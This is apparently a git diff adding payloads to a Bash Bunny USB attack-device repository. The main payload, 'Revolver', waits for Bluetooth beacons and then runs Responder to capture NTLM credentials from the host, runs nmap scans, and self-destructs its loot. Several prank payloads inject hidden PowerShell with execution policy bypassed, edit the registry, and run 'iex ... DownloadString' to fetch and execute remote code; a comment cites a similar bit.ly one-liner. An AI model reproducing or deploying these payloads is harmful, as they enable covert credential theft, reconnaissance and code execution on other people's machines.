tar -czvf "/tmp/massdisk/loot/recscript/ch_fw_`cat /root/version.txt`.tar.gz" upgrade &> /tmp/massdisk/loot/recscript/Firmware_Com_errors.txt > /tmp/massdisk/loot/recscript/Firmware_Com_output.txt
|
||||
cd /tmp/rootexfs # Move back to orignal directory.
|
||||
# Image compliation completed.
|
||||
|
||||
###########
|
||||
# STAGE 4 #
|
||||
###########
|
||||
# Check if firmware file exists in recdisk. If not, copy generated firmware file to recdisk.
|
||||
LED STAGE4
|
||||
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
|
||||
# Let's check if an image already exists in the recdisk.
|
||||
startString="ch_fw_"
|
||||
entry=`ls /tmp/recdisk/root/ | while read line; do echo ${line} | grep "^$startString.*.tar.gz$";done | head -n 1`
|
||||
NeedToWriteFirmWareImage=0
|
||||
if [ "$entry" = "" ]; then
|
||||
LED R SOLID # Indicate that a firmware image was missing.
|
||||
sleep 1
|
||||
NeedToWriteFirmWareImage=1
|
||||
else
|
||||
LED C QUAD # An existing firmware image was found.
|
||||
sleep 1
|
||||
if [ $Overwrite -eq 1 ]; then
|
||||
NeedToWriteFirmWareImage=1
|
||||
fi
|
||||
fi
|
||||
if [ $NeedToWriteFirmWareImage -eq 1 ] && [ $WriteToRecovery -eq 1 ]; then
|
||||
LED M VERYFAST # Copying firmware image from massdisk to recovery disk.
|
||||
cp /tmp/massdisk/loot/recscript/ch_fw*.tar.gz /tmp/recdisk/root/
|
||||
sync # Just in case.
|
||||
fi
|
||||
|
||||
###########
|
||||
# CLEANUP #
|
||||
###########
|
||||
LED CLEANUP
|
||||
sleep 1 # Script may be quicker than LED blinking, so let's delay by one second for user interface.
|
||||
# Removing a bunch of directories.
|
||||
rm -R /tmp/cachedisk/*
|
||||
sync
|
||||
umount /tmp/cachedisk
|
||||
umount /tmp/massdisk
|
||||
umount /tmp/recdisk
|
||||
rmdir /tmp/cachedisk
|
||||
rmdir /tmp/massdisk
|
||||
rmdir /tmp/recdisk
|
||||
rm -R /tmp/rootexfs
|
||||
|
||||
##########
|
||||
# FINISH #
|
||||
##########
|
||||
LED FINISH
|
||||
sleep 1
|
||||
# End of the script will swap to LED BLUE SLOW and activate our storage.
|
||||
LED B SLOW
|
||||
ATTACKMODE SERIAL STORAGE
|
||||
exit 0
|
|
@ -0,0 +1,38 @@
|
|||
## FICBunny
|
||||
|
||||
* Title: FICBunny
|
||||
* Short Description: Firmware Image Creator for the Bash Bunny
|
||||
* Author: HSF3232 (@Hacksawfred3232)
|
||||
* Contributer: Austin Spraggins (@spragginsdesigns)
|
||||
* Version: 1.0
|
||||
* Last tested Bunny Firmware version: 1.7
|
||||
|
||||
## Long Description
|
||||
|
||||
The primary purpose of this script is to create a backup image (in case you want to revert to a known good point). Then replace the missing firmware image within /dev/nandg, should it be missing.
|
||||
|
||||
Note: It may be a good idea to disable non-critical services - if any - on the bunny before starting this payload.
|
||||
|
||||
**WARNING: /dev/nandg CONTAINS RECOVERY RELATED FILES! WHILE I HAVE TESTED THIS SCRIPT MANY TIMES TO ENSURE IT DOESN'T DO ANYTHING SCREWEY, YOU NORMALLY SHOULD NOT TOUCH /dev/nandg! IF YOU DON'T WANT TO MESS WITH THE RECOVERY PARTITION, TURN OFF "WriteToRecovery"!!**
|
||||
|
||||
## Variables
|
||||
| Name | Description | Default |
|
||||
| --------------- | --------------------------------------------------------------------------------- | ------- |
|
||||
| WriteToRecovery | When firmware image extraction is complete, write the firmware image to recovery? | 1 |
|
||||
| Overwrite | If an existing firmware file is detected within recovery, overwrite it? | 0 |
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ----------------------- | ------------------------------------------------------------------------------------------------------------- |
|
||||
| SETUP | Copying required script file to /tmp, creating needed directories, and mounting partitions |
|
||||
| FAIL | Couldn't find the file of script needed within payload directory |
|
||||
| STAGE 1 | Extracting uImage file |
|
||||
| STAGE 2 | Copying rootFS into rootfs.tar |
|
||||
| STAGE 3 | Compile the firmware file from rootfs.tar and uImage into a file on MassDisk |
|
||||
| STAGE 4 | Looking in Recovery partition for backup firmware image |
|
||||
| R SOLID | Backup firmware image missing! If told to, will copy generated backup firmware image into recovery. |
|
||||
| C QUAD | Backup firmware image found! If told to, script will overwrite it. |
|
||||
| M VERYFAST | Writing to recovery partition, **DO NOT UNPLUG!!!!** |
|
||||
| CLEANUP | Removing temporary directories and unmounting partitions |
|
||||
| FINISH | Script is finished, starting arming mode (ATTACKMODE SERIAL STORAGE) |
|
|
@ -0,0 +1,261 @@
|
|||
# Title: Revolver
|
||||
# Description: Multiple network attacks and modes based on BLE beacons
|
||||
# Author: saintcrossbow
|
||||
# Props: Hak5Darren (BLE, QuickCreds, nmap)
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
# Target: Windows 10 with minimum powershell usage
|
||||
# Attackmodes: All
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# This payload was made in the style of Q Branch: those that use this need to know they have
|
||||
# multiple options for attack as well as getting out of a bad situation. Switching into this
|
||||
# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start
|
||||
# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The
|
||||
# payload is easily extendable to include any attack you might need in the field.
|
||||
#
|
||||
# Note other payloads were co-opted into this multimode attack, and to make it easy I used
|
||||
# Hak5Darren's code, partially because I imagine he wants to see these payloads extended,
|
||||
# and also because I know he appreciates Q Branch.
|
||||
|
||||
# Configuring
|
||||
# -----------
|
||||
# Change the BLE beacon commands listed in Options below to something unique to you. Definitely
|
||||
# do not want someone else activating your Bash Bunny. Also verify the responder and nmap
|
||||
# options are to your liking.
|
||||
|
||||
# Usage
|
||||
# -----
|
||||
# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the
|
||||
# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop.
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Slow white LED: Awaiting BLE commands
|
||||
# Yellow: Attack in progress
|
||||
# Red: Self destruct of loot
|
||||
# Blue solid: USB mode
|
||||
# Cyan solid: Ethernet mode
|
||||
|
||||
# Options
|
||||
# -------
|
||||
REQUIRETOOL responder
|
||||
|
||||
# BLE beacon options - change to your preferences. Make sure to use things
|
||||
# you'll not encounter since you don't want to start a self-destruct sequence
|
||||
# on accident
|
||||
ABORT_MISSION="QSTOP"
|
||||
START_QUICKCREDS_WIN="QCREDS"
|
||||
START_QUICKCREDS_NIX="QCREDNIX"
|
||||
START_NMAP="QNMAP"
|
||||
START_USB="QLOOT"
|
||||
START_ETHER="QETHER"
|
||||
START_DEL_LOOT="QSELFD"
|
||||
|
||||
# Responder options
|
||||
RESPONDER_OPTIONS="-w -r -d P"
|
||||
RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds
|
||||
# Nmap options
|
||||
NMAP_OPTIONS = "-sS -O -sV -F -oA"
|
||||
NMAP_LOOTDIR=/root/udisk/loot/nmap
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
|
||||
# Responder
|
||||
# ---------
|
||||
# Note: This is a modified version of quick creds
|
||||
# Original by Hak5Darren
|
||||
# ---------
|
||||
startResponder()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
# Set convenience variables
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $RESPONDER_LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# As a backup also copy logs to a loot directory in /root/loot/
|
||||
mkdir -p /root/loot/quickcreds/$HOST-$COUNT
|
||||
|
||||
# Check target IP address. If unset, blink RED and end.
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Set LED yellow, run attack
|
||||
LED ATTACK
|
||||
cd /tools/responder
|
||||
|
||||
# Clean logs directory
|
||||
rm logs/*
|
||||
|
||||
# Run Responder with specified options
|
||||
python Responder.py -I usb0 $RESPONDER_OPTIONS &
|
||||
|
||||
# Wait until NTLM log is found
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
# Ima just loop here until NTLM logs are found
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* /root/loot/quickcreds/$HOST-$COUNT
|
||||
cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync USB disk filesystem
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
|
||||
# Return to waiting mode
|
||||
CUCUMBER ENABLE
|
||||
LED W SLOW
|
||||
}
|
||||
|
||||
# Nmap
|
||||
# ----
|
||||
# Note: This is a modified version of one of the very first payloads, nmap
|
||||
# Original by Hak5Darren
|
||||
# ----
|
||||
startNmap()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
GET TARGET_HOSTNAME
|
||||
GET TARGET_IP
|
||||
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $NMAP_LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
|
||||
if [ -z ""${TARGET_IP} ]; then
|
||||
LED FAIL
|
||||
Q DELAY 1500
|
||||
else
|
||||
LED ATTACK
|
||||
nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
fi
|
||||
|
||||
# Return to waiting mode
|
||||
CUCUMBER ENABLE
|
||||
LED W SLOW
|
||||
}
|
||||
|
||||
startLoot()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
# We are going for solid LED this time in case the device needs to be played off as normal USB
|
||||
# ... and best of luck to you on that!
|
||||
LED B SOLID
|
||||
ATTACKMODE STORAGE
|
||||
}
|
||||
|
||||
# For sharing, getting on via putty, or exiting USB mode
|
||||
startEthernet()
|
||||
{
|
||||
CUCUMBER DISABLE
|
||||
LED C SOLID
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
}
|
||||
|
||||
|
||||
# Delete everything in loot directory
|
||||
# Depending on your engagement, could also delete switch and library - but be careful!
|
||||
# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. Going plaid
|
||||
# to delete those files
|
||||
startSelfDestruct()
|
||||
{
|
||||
ATTACKMODE HID
|
||||
CUCUMBER PLAID
|
||||
LED R SOLID
|
||||
rm -r /root/udisk/loot
|
||||
rm -r /root/loot/
|
||||
sync
|
||||
shutdown now
|
||||
}
|
||||
|
||||
# Main
|
||||
# ----
|
||||
# Start bluetooth for observation
|
||||
source bunny_helpers.sh
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
|
||||
# Wait for BLE
|
||||
CUCUMBER ENABLE
|
||||
LED W SLOW
|
||||
|
||||
while :
|
||||
do
|
||||
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
|
||||
# Shutdown
|
||||
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
fi
|
||||
|
||||
# Responder - Windows
|
||||
if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
startResponder
|
||||
fi
|
||||
|
||||
# Responder - *nix or mac
|
||||
if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
startResponder
|
||||
fi
|
||||
|
||||
# Start nmap against host
|
||||
if grep -ao $START_NMAP /tmp/bt_observation; then
|
||||
startNmap
|
||||
fi
|
||||
|
||||
# Open as USB device
|
||||
if grep -ao $START_USB /tmp/bt_observation; then
|
||||
startLoot
|
||||
fi
|
||||
|
||||
# Open as Ethernet device
|
||||
if grep -ao $START_ETHER /tmp/bt_observation; then
|
||||
startEthernet
|
||||
fi
|
||||
|
||||
# Limited self-destruct of loot
|
||||
if grep -ao $START_DEL_LOOT /tmp/bt_observation; then
|
||||
startSelfDestruct
|
||||
# Leave the scene after the delete
|
||||
break
|
||||
fi
|
||||
|
||||
done
|
||||
|
||||
sync
|
|
@ -0,0 +1,25 @@
|
|||
## Revolver
|
||||
|
||||
|
||||
This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field.
|
||||
|
||||
Note other payloads were co-opted into this multimode attack, and to make it easy
|
||||
I used Hak5Darren's code, partially because I imagine he wants to see these payloads
|
||||
extended, and also because I know he appreciates Q Branch.
|
||||
|
||||
**Features**
|
||||
- Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons
|
||||
- Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct
|
||||
- After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down)
|
||||
|
||||
**Payload Configuration**
|
||||
1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny!
|
||||
2. Verify the responder and nmap options are to your liking
|
||||
|
||||
**LED meanings**
|
||||
- Slow 1 second white on and off: Awaiting commands
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid: Attack complete
|
||||
- Solid red: Loot self-destruct - complete and ready to remove when off
|
||||
- Solid blue: USB mode
|
||||
- Solid cyan: Ethernet mode
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,20 @@
|
|||
# Title: Excel QR Rickroll
|
||||
# Description: Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Pranks
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Extensions: Run
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\QRcode.ps1')"
|
||||
|
||||
LED FINNISH
|
|
@ -0,0 +1,22 @@
|
|||
# Excel QR Rickroll
|
||||
* Author: Cribbit
|
||||
* Version: 1.0
|
||||
* Target: Windows (Powershell 5.1+) + Excel
|
||||
* Category: pranks
|
||||
* Attackmode: HID
|
||||
* Extensions: Run
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | ------------------------------|
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
|
||||
|
||||
## Colors
|
||||
| Status | Color | Description |
|
||||
| --------- | ------------------------------| ------------------------------------------------ |
|
||||
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
Binary file not shown.
Binary file not shown.
After Width: | Height: | Size: 4.2 KiB |
|
@ -0,0 +1,20 @@
|
|||
# Title: Replace Cursor
|
||||
# Description: Replaces the standard arrow with a little bash bunny.
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Pranks
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: HID & STORAGE
|
||||
# Extensions: Run
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED ATTACK
|
||||
|
||||
RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ps.ps1')"
|
||||
|
||||
LED FINNISH
|
|
@ -0,0 +1,15 @@
|
|||
# Copies the bunny ani file to the users profile.
|
||||
$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani'
|
||||
$f= $Env:USERPROFILE+'\b.ani'
|
||||
if (Test-Path $p)
|
||||
{
|
||||
cp $p $f
|
||||
}
|
||||
else
|
||||
{
|
||||
cp ($p -replace "1", "2") $f
|
||||
}
|
||||
# Set the registory value of Arrow to the new cursor
|
||||
sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani';
|
||||
# Tell the system to update the displayed cursor
|
||||
(Add-Type -Name c -Pass -M '[DllImport("user32.dll")] public static extern bool SystemParametersInfo(int A,int b,int c,int d);')::SystemParametersInfo(87,0,0,3)
|
|
@ -0,0 +1,47 @@
|
|||
# Replace Cursor
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows 10 (Powershell 5.1+)
|
||||
- Category: Pranks
|
||||
- Attackmode: HID & Storage
|
||||
- Extensions: Run
|
||||
- Props: The Hak5 Team (Wallpaper changer & Eject USB sound)
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Replaces the standard arrow with a little bash bunny icon.
|
||||
|
||||
## Notes
|
||||
I have included a both a static and animated cursor.
|
||||
|
||||
## Information about SystemParametersInfo
|
||||
### Microsoft Doc:
|
||||
|
||||
https://docs.microsoft.com/en-gb/windows/win32/api/winuser/nf-winuser-systemparametersinfoa
|
||||
|
||||
### Flags
|
||||
|
||||
```
|
||||
SPI_SETCURSORS = 0x0057;
|
||||
```
|
||||
|
||||
Convert uint to int = 87;
|
||||
|
||||
```
|
||||
SPIF_UPDATEINIFILE = 0x01;
|
||||
SPIF_SENDCHANGE = 0x02;
|
||||
```
|
||||
|
||||
Bitwise "OR" these two together (0x01 -bor 0x02) = 3;
|
||||
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| ------ | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISH | Green blink followed by SOLID | Script is finished |
|
Binary file not shown.
After Width: | Height: | Size: 14 KiB |
Binary file not shown.
After Width: | Height: | Size: 240 KiB |
|
@ -0,0 +1,39 @@
|
|||
#!/bin/bash
|
||||
# Title: Spinning Around
|
||||
# Description: Spinning Ascii Hak5 Logo
|
||||
# Author: Cribbit
|
||||
# Version: 1.0
|
||||
# Category: Pranks
|
||||
# Target: Windows (Powershell 5.1+)
|
||||
# Attackmodes: RNDIS_ETHERNET HID
|
||||
# Props: TW-D - inspiration, audibleblink - python server
|
||||
# Super mad Prop: Lee Holmes - Powershell Rickroll iex (New-Object Net.WebClient).DownloadString(“http://bit.ly/e0Mw9w")
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
# disallow outgoing dns requests so server starts immediately
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
# attack commences
|
||||
LED ATTACK
|
||||
QUACK DELAY 200
|
||||
RUN WIN Powershell
|
||||
QUACK DELAY 500
|
||||
QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/spin\")"
|
||||
QUACK ENTER
|
||||
LED FINISH
|
||||
|
|
@ -0,0 +1,28 @@
|
|||
# Spinning Around
|
||||
- Author: Cribbit
|
||||
- Version: 1.0
|
||||
- Target: Windows (Powershell 5.1+)
|
||||
- Category: Pranks
|
||||
- Attackmode: HID & RNDIS_ETHERNET
|
||||
- Extensions: Run
|
||||
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | --------------- |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
## Description
|
||||
Spinning Ascii Hak5 Logo in a powershell window\
|
||||
![Demo](demo.gif)
|
||||
|
||||
## Props
|
||||
To TW-D for the inspiration, audibleblink for python server code "execution/ShellExec/payload.txt" and
|
||||
Super mad props to Lee Holmes for Powershell Rickroll for the animation code.
|
||||
https://www.leeholmes.com/powershell-and-html5/
|
||||
|
||||
## Colours
|
||||
| Status | Colour | Description |
|
||||
| -------- | ----------------------------- | --------------------------- |
|
||||
| SETUP | Magenta solid | Setting attack mode |
|
||||
| ATTACK | Yellow single blink | Injecting Powershell script |
|
||||
| FINISHED | Green blink followed by SOLID | Injection finished |
|
|
@ -0,0 +1,71 @@
|
|||
|
||||
$frames = @(
|
||||
" # # # # # ;;iii; ,::::, ..,. # # :MX,:,M 0ii;2r MMMMMMMMMMMMMMMMMr # # SX.,.iW B7 ,i; 0MM@BWWWMMMMMMMMMM # # a.., 0Z r...: .... . ..MMM8a8880r,:iiiii, # # X.,, ZX .:, 2Z .;. XM722r, .MM7Si,MMMr :ZZZZZZ0, # # r.,,...,:;;::,..i. iM2 ..:r rMM iMMZ X0ZZZ8Z0MMMMMMM0 # # ,,,, ;a7;,.,.,,: ,Mr .S .r ;MB :8 ,8MB88808Z000BBBBWMX # # i,,.8;77,i.;2.,,:iMX 8M. ; XMZ SMM0000ZZMMM0Z8880M: # # 2S.,.M: X7 ,.;Ma SMMr ,.WMr .MB , MMMMaZZZZB0 # # ,2 ,. M Zr.,.0W .;i. ...MM iMMB 7SZaX:SMMMZZZZZ8@i # # r;.,.:Z @Z..i0. ;i: ;Z,. MM , @M2ZM@MMMWMMM02ZZZZWS # # r;:;.2: S,:,iZ ;r ,MX,,82.;X 2MMB000088MM@aaZZZBa # # .:i;:. ... .. MMMMMMZZ888ZBMMZaZZ8W2 # # .ZaS8MB0008ZZ8ZZ80BWr # # .XZ88BB88000Zr # # # # # # # "
|
||||
" # # # # # 7MMMMSXX2r X2ZWai7X7. # # ,MMMM87i;7: SMMMM8:;2Z. BMMMMM@@WWB0BBZ2 # # ZMMM2 :ii7 MMMMM::i7 rMMMMMMMMMMMMMMMM # # WMMMr ii;a SMMMM:.ii: .. . :MMMMMW80BB77XX;7: # # MMMMi.iiiX, MMMM@;,,8MMMMS820MMMM22MMM; S08800 # # MMMM:,iii;7, .:i,SMMMa,i:2MMM0 :M@. Z0888BMMMMM7 # # WMMM ,iiiir7. ,:i,iMMX iS..MMM2 .S ZMB8888WBBWWM@ # # aMMM,:iiSrXMM@88X:i.7MZ WM aMM7 . :MM808B@M@800M2 # # ;MMMM7,i7r MMMMM,:i 0M XMM: iMM: WM. ZMMMMMBZ80M, # # MMMM;.iiri MMMMB ::,Mr .::,.. MM. MMZ 2ZM@BWMWZ88W8 # # ,MMM8 ,iir, .MMMMW7,,28.:S8SX;, 0@ MMMZ@W8ZaWM0Z80M. # # iMMMZ :ii; XMMMMS:i:2X:SWMMMM:iZa,7MMMM888Z0MWZ88@X # # iMMMa,7XXi .iSB::i,7;, MMMMMM8WB8808BW880@S # # ,. ,,. :ZMWBMMW@WWBBW@Br # # ,iiXXXi: # # # # # # # "
|
||||
" # # # ,,,;rrX;:. # # SMMMMMMMMMMZ8@MMMM@Sa2 # # MMMMMMMMMB2X7WMMMMMXZ0 i@BBBBBM0ZaSX: # # MMMMMM@MMSi7rWMMMMMXXX MMMMMMMMMMMMMM # # .MM@@@@W@MX;r7MMMMMZiX; 7MMMMMMMWWB7XZi # # ;MM@@@@@MM7r7;BWW@M8;2MMM0ZMMWXWMXSBW8 # # iMM@@@@@MM;r7;i,:i;rrXMMWr;BM0 BZ aBBWMMM # # iMM@@@@@M@;r7;iri,irr;MMiXi2MB,Xi8@0B@@MM # # MM@@@@@M@ir7SZMM8ZX;rM2:MrrM0:ii@MBWMW@M # # iMM@@@@@MMX;XMMMMMM;;SMi2MXiMZ7M:XMMM@0M8 # # MM@@@@@@M0rrr@MMMM0iiZ8:7X;:MaXMS2WB@W0Mr # # ;MM@@@@@@Mr;r;MM@@MBr;BX;a27,0XXMM088@BBM # # 2MM@@@@@M@;rrrMMMMM8r787@MMMiZX8MM00BM0MX # # BMMMMMMMMW;rrS@MMMMS7XSiMMMMMMMMBB0BBW@@ # # rZ88W@MMMM7aa S@@MMMMMMM@W8 # # # # # # # # # "
|
||||
" # # # 2a222222aBBB0; # # rMMMMMMMMMMMMMMMM: # # 7MMMMMMMMMMMMMBMM@80BX # # XMM@@@@@@@WWMBZMWMMMMMa # # 8M@WWWWWWWWWM0ZM0WMMMM, # # ZM@@@@@@@@W@M0ZM0BBWMX # # ZM@@@@@@@@@@MB2aZ008WM: # # ZM@@@@@@@@@@M82aa008@Mi # # ZM@@@@@@@@@@M8Z@8008WMi # # XM@WWW@@@@@@MBBM80B0WM # # WMWWBBBBBBBWW80MZZZWMM # # MMWWWWWWWWWW@Z0MZ8ZBMM # # MMWWWWWWWWW@@a0MaWW0MW # # MM@@@@@WWW@@@aWM0MMMMB # # MMMMMMMMMMMMMBWMMMMMM, # # i,...irrrrrrX. # # # # # # # "
|
||||
" # # # r8B0222222222; # # XMMMMMMMMMMMMMMMMM, # # 7ZB0008MMMMW@MMMMMMMMMMMMX # # ,MMMMMMMMWMM00@@@@@W@@@@MMX # # ZMM@@@@B8WW88@WWWWWWWWW@M0 # # 2MBWBBB0WW88@@WWWWWWW@@MW # # MM@0BB0W88888@@@@@@@@@@@MW # # @MM8BW0W88088@@@@@@@@@@@MW # # WMM80B0B0WM08@@@@@@@@@@@Ma # # WMB0BBWB8@MW8@@@@@@@@WW@MX # # 2M@@W0808W@WZWWBBBBBBBBWMM # # XMMMB8BB0W@WZBWWWWWWWWWWMM, # # .MM@BBMB8WMWZB@WWWWWWWW@MMi # # MMMMMMMB@MM8BM@@@@@@@@@MM2 # # ;MM@MMMMW00@MMMMMMMMMMMMMZ # # ;r;;ri..... . # # # # # # # "
|
||||
" # # # ...;7;., # # i08ZMMMWWWWBBMMMMMMMMM7 # # ,X2Z88WMMWBBBWi :M0aMMMMMMZXS8MMMMMMMMM # # 2MMMMMMMMMMMMMB aSSMMMMMMZ7XraMMMMMMMM # # 82XX@MWMMMMMMM; rXraMM@MMB7XrSMM@@@@MMr # # 0WB8r0MBaMMMB@MMMMS;ZM@@WMB7X77@M@@@@MMX # # 7MMMWBB0i:@8,WMM22aMMM7r7r;ri;7XXXr@M@@@@MM7 # # BMMWWBBW@7r2;WMW;a7XM@r77ri;XXrXXXrWM@@@@MMX # # 7MWWMWBWMZir;0MZiWZ:BM77X00@MMaSXXrBM@@@@MM # # MWBMMMMBiXM;aMS;MM;XMS77WMMMMM@77XMM@@WWMM7 # # @MB@@BWWSBM;2M7rXS7;B877aMMMMMBr77ZM@@W@MMM: # # rMWW@0B@WMM77@rXaZar2WX70MM@@MWr7rrWM@@@MMMZ # # MMBMWBWWMM8S0XZMMM8SBSXaMMMMMM7X7rBM@@@@MMW # # ,MMWWBBBWWMMMMMMM; r2XX7@M@WW02SXr0MMMMMMMM # # iWMMMMMMMMMMWZ iZZX0M@W82SXS # # , # # # # # # # "
|
||||
" # # # # # :XrX708Xi r2XXZMMB: # # X0BBWWMMMMMMMMMMZ rB27;MMMMi ;S7rXWMMM # # 7MMMMMMMMMMMMMMMM; ,X;i7MMMM ,S;;::ZMM2 # # ;7i;SXrBWB00MMMMMi . ,. i:i.7MMMX Z;i:.7MMM # # ZB88Z8; ZMMMZaMMMMMXBaMMMMM;:.7@MMM :X;ii,iMM@ # # 0MMMMMB88880X rMMi,8MMMW,;;;MMMM:::,..:rr;7;;;i:,MM@ # # .MMWWBBW8Z880@MX :Z:.XMMM;.rX .@M@.:::, :7Z7ii;i: @M@ # # @@008@MM080Z0MW.. :.;MMW..2M: .MMi,iiaBBM8rSra;i:,MM0 # # XM0880MMMMMr :.,MB .MM2 ,BMM. rMX,i:7MMMB aXi:rMMMX # # MB08ZWM@WM@SZS.BMM BMi,:::;.. 0B,ii,MMMM :Xii.;MMM # # rMB8Z8MM8ZBMMM8MMM aM.:;XSZ0r,i@X::SMMMM. ,X;i, 0MMi # # ZM08ZBM@800BBMMMMX.7Bri0MMMB;X:0Xii:aMMMS r;i: aMM7 # # 8M08ZW@88008B0BMMMMM, .,;;:: iai. iS2X:SMM: # # S@MWBBBBWWWMMW@Br. # # :;XXaZXri, # # # # # # # "
|
||||
